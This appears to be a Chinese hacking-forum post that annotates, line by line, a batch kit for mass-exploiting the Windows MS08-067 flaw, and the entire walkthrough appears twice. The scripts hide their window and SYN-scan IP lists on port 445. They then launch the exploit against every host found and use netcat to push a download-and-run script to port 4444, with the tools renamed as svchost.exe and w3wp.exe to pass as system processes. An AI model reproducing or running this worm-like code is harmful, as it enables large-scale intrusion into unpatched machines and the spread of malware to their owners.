今天你黑了吗
暴强网友评腾讯11月3
14:34 
Windows向来以漏洞著称,最近的MS08067就是一个很好的例子,简直就是木马横飞啊。既然Windows保护不了我们的安全,装个好点的杀毒软件也是很不错的选择……再就是按时打补丁
别人都玩MS08067了,我们也不能落后,这里来看一份MS08067批量溢出程序,看看它是怎样工作的.
其中包含1.vbs(启动程序),1.bat(工作),smss.exe(S扫描器),taskmgr.exe(扫描器),w3wp.exe(NC),conime.exe(2000的CMD),svchost.exe(MS08067)
1.vbs
On Error Resume Next
set wshshell=createobject("wscript.shell")
a=wshshell.run ("conime.exe /c 1.bat" ,0) 这里用WSH来运行可以实现隐藏窗口,不过不是每个服务器都支持的
1.bat
@echo off
@color a CMD颜色
@for /f "eol= tokens=1,2 delims= " %%a in (ip.txt) do (
@smss.exe syn %%a %%b 445 1024 /save 从IP文件中读取IP地址用S扫描器以SYN方式扫描,保存为result.txt
@del ok.txt 可能是二次运行,删除上次遗留下来的文件
@for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
@for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
@for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>ips.txt 去除垃圾,取出IP信息
@taskmgr.exe -l ips.txt -o 1.txt 再扫描一次保存为1.txt
@del result.txt 删除S扫描器扫描的结果
@del s1.txt
@del s2.txt
@del ips.txt 把没用的东西都删除
@for /f "eol=[ tokens=1 delims= " %%i in (1.txt) do echo %%i>>2.txt
@for /f "eol=h tokens=1 delims= " %%i in (2.txt) do echo %%i>>ok.txt 把第二次扫描的结果保存为OK.TXT可以开始干活了
@del 1.txt
@del 2.txt
@del *.cmd /q 删除垃圾
@tskill w3wp
@ping 1 -n 1 -w 15000 2>nul 1>nul
@for /f "tokens=1 delims= " %%i in (ok.txt) do (
>%%i.cmd echo ^svchost.exe %%i ^| findstr /i "payload"^| w3wp.exe %%i 4444 0^<up.txt ^& del %%i.cmd ^& exit
>>%%i.cmd echo del %%0 ^& exit 重点,写批处理,每个可以溢出的IP一个CMD,加快速度。up.txt中写的一个下载运行的批处理,溢出后用NC发送到4444端口
start %%i.cmd 开始溢出啦
@ping 1 -n 1 -w 400 2>nul 1>nul
)
if "%%a"=="over" call 1.bat 如果IP文件尾部有OVER标记就再来一次
)
del ok.txt /q
别人都玩MS08067了,我们也不能落后,这里来看一份MS08067批量溢出程序,看看它是怎样工作的.
其中包含1.vbs(启动程序),1.bat(工作),smss.exe(S扫描器),taskmgr.exe(扫描器),w3wp.exe(NC),conime.exe(2000的CMD),svchost.exe(MS08067)
1.vbs
On Error Resume Next
set wshshell=createobject("wscript.shell")
a=wshshell.run ("conime.exe /c 1.bat" ,0) 这里用WSH来运行可以实现隐藏窗口,不过不是每个服务器都支持的
1.bat
@echo off
@color a CMD颜色
@for /f "eol= tokens=1,2 delims= " %%a in (ip.txt) do (
@smss.exe syn %%a %%b 445 1024 /save 从IP文件中读取IP地址用S扫描器以SYN方式扫描,保存为result.txt
@del ok.txt 可能是二次运行,删除上次遗留下来的文件
@for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
@for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
@for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>ips.txt 去除垃圾,取出IP信息
@taskmgr.exe -l ips.txt -o 1.txt 再扫描一次保存为1.txt
@del result.txt 删除S扫描器扫描的结果
@del s1.txt
@del s2.txt
@del ips.txt 把没用的东西都删除
@for /f "eol=[ tokens=1 delims= " %%i in (1.txt) do echo %%i>>2.txt
@for /f "eol=h tokens=1 delims= " %%i in (2.txt) do echo %%i>>ok.txt 把第二次扫描的结果保存为OK.TXT可以开始干活了
@del 1.txt
@del 2.txt
@del *.cmd /q 删除垃圾
@tskill w3wp
@ping 1 -n 1 -w 15000 2>nul 1>nul
@for /f "tokens=1 delims= " %%i in (ok.txt) do (
>%%i.cmd echo ^svchost.exe %%i ^| findstr /i "payload"^| w3wp.exe %%i 4444 0^<up.txt ^& del %%i.cmd ^& exit
>>%%i.cmd echo del %%0 ^& exit 重点,写批处理,每个可以溢出的IP一个CMD,加快速度。up.txt中写的一个下载运行的批处理,溢出后用NC发送到4444端口
start %%i.cmd 开始溢出啦
@ping 1 -n 1 -w 400 2>nul 1>nul
)
if "%%a"=="over" call 1.bat 如果IP文件尾部有OVER标记就再来一次
)
del ok.txt /q
